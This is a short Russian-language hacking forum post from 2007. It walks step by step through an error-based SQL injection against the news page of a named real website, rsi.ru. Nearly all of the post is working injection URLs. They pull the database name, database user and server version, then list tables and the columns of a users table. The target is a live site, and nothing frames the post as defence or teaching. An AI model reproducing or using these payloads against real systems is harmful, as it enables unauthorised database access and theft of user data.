06.04.2007, 22:18
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами:
10307906
Репутация:
1365
|
|
Наша цель :
Имя базы:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20db_name())--
Наш юзверь:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(select%20system_user)--
Версия:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=@@version--
перебераем таблицы:
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('T_LastDat','ORDERS','ClientShort','cnf_greenwood','cnf_rsi','cnf_rsi_parts','cnf_rsi_s','cnf_rsi_users'))--
Теперь перебераем колонки :
Код:
http://www.rsi.ru/News/news.asp?id=2354+or+2354=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cnf_rsi_users'+AND+COLUMN_NAME+NOT+IN+('user','u_id','user_nm','user_bd'))--
|
|
|